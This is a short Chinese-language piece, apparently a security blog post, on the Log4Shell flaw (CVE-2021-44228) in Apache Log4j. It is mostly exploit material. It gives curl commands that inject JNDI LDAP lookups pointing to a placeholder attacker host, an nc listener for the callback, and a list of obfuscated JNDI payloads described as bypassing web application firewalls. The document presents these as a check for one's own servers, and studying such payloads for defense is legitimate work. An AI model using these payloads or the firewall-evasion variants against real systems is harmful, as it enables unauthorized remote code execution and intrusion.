2021年12月5日,Apache在其广泛使用的Log4j日志服务中发现了一个漏洞(后确定为CVE-2021-44228),又名Log4shell。该漏洞使攻击者能够完全控制受影响的服务器,通过允许未经验证的远程代码执行,前提是用户运行的是使用Java日志库的应用程序。Log4j被大量集成到广泛的DevOps框架、企业IT系统以及供应商软件和云产品中。
在恶意远程主机上执行以下操作,以检查您的服务器是否易受Log4j漏洞利用:
curl vulnserver:port -H 'X-Api-Version: ${jndi:ldap://malicioushost:mport/a}'
nc -lnvp mport
其他涉及HTTP-POST请求的变体也可用于检查漏洞:
curl -H 'User-Agent: ${jndi:ldap://malicioushost:mport/a}' vulnserver:port
绕过Web应用防火墙的变体:
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}
${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}
${jndi:rmi://adsasd.asdasd.asdasd}
${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}